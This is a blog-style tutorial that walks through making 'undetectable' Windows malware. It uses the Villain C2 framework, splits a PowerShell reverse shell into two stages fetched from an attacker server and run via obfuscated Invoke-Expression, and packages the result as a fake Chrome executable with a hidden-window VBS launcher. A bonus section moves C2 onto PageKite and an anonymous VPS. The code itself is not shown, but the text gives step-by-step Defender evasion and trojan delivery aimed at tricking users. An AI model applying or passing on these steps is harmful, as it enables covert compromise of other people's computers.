Creating Undetectable Windows Malware (Villain C2 Framework+ PowerShell Obfuscation + Undetectable Delivery)
DISCLAIMER: Using these tools and methods against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using these tools and methods.
Anti-virus and Windows Defender use a combination of signature-based detection, behavior-based detection, and today AI analysis solutions to detect and block malware or C2 connection attempts. Typically, signature-based detection is the easiest to bypass and attackers find it much harder when a script is dynamically analyzed by the host before executing using something like AMSI. I found this cool new tool yesterday called Villain and wanted to find a way to use it to bypass modern AV or at the very least, an up-to-date Windows Defender which focuses on real-time threats.
The framework is extremely easy to use- just generate a payload and paste it on the target, it even sets up the listeners for you! However, one thing you’ll notice about doing this with Windows Defender enabled is that the default output is quickly flagged as malicious:
I decided to do some research on obfuscation techniques and found this resource by the same creator:
I did acouple things first to try to change the signature:
- Inserted random comments and spaces in the script
- Created random hex-encoded variable names
- Input random quotes inside iex and pwd
None of these seemed to work. About 9 months ago in 2023, you could have just done simple things in the script like change iex to i’’e’’x or change the default names of variables like $data to $3e59da34d2 but it’s not that simple today. Creating malware that won’t be flagged in 2024 takes some trail and error.
Next I decided to try splitting up the command arguments to determine when AV detected that it was malicious. I determined that separating the first variable that creates a TCPClient socket with my attacker host from the rest of the script actually didn't raise flags and I received a shell on Villain.
Now I needed a way to allow these two parts of the Villain PS script to run together but execute separately, so I decided to use the Get-Command Technique with wildcards in the resource mentioned above. The & operator runs the commands as jobs. Basically, it’s retrieving the string itself from the URI indicated (our scripts) and then running that string (command) with the Invoke-Expression command also used with a wildcard to bypass detection. The two Get-Command’s look weird like this to decrease the Shannon Entropy that might otherwise be too high and detected by AV:
To actually execute this on the windows host from the command line, I needed to do acouple things:
- I created two PS scripts called stage1.ps1 and stage2.ps1 which includes the first and second part of the Villain PS script I created, respectfully (I added the other obfuscation techniques in there just for poc, but it’s not required). These will be run on the victim with IP 10.0.2.5.
2. Host these scripts on a web server on my attacker host which has IP 10.0.2.9 (over a non-flagged port like 80 or 443) to serve to the Victim.
Wait- this is great, but I want to receive a shell by a user downloading or opening something inconspicuous. To do this, I used Invoke-PS2EXE on my windows host to convert the PS script two liner above to a windows executable and then used WinRaR to make it look like a normal chrome executable (this will be another post if you don’t know).
One thing I noticed is that when a user opened the malicious chrome executable, a command window would pop up that the user could easily click out of and end my shell session. To get around this, I packaged a simple vbs script with the malicious executable and a clean chrome browser (in WinRaR) that would simply run the malicious executable with no window popup- not giving the user the power to stop our shell:)
Now it’s just a matter of social engineering a way to get a user to download this seemingly innocent executable or put it there yourself with an existing foothold. Windows Defender is active on the Victim.
When a user double clicks on our malicious chrome executable, stage1.ps1 and stage2.ps1 are downloaded and executed from our server, then a session is created on Villain, and finally google chrome opens like normal for the user.
Attackers are going to have to work harder to bypass updated defenses this year, but it’s not anywhere near impossible even with real-time analysis. I hope you enjoyed this post!
BONUS: C2 over the Internet
Pagekite can be used to deliver and execute our PS scripts over the internet instead of the local network. Sign up with a valid email for a 30 day free trial. We can also use a cheap VPS with a public IP address to catch our Villain generated netcat reverse shell.
First, change the IP of your attacker host local IP to the IP of the public facing VPS instance so we can connect over the internet:
Then, create a web server hosting the files stage1.ps1 and stage2.ps1 on our PageKite FQDN called something like python3.pagekite.me.
Lastly, change the test.ps1 script to now grab the files from PageKite and not the local host. Then convert this into an executable like before and send to the victim.
On our anonymous VPS instance, open Villain and wait for the connection over the internet (might have to do some port forwarding configuration).
And now we received a reverse shell by using PageKite and a VPS which an attacker can create anonymously and discard after actions-on:)
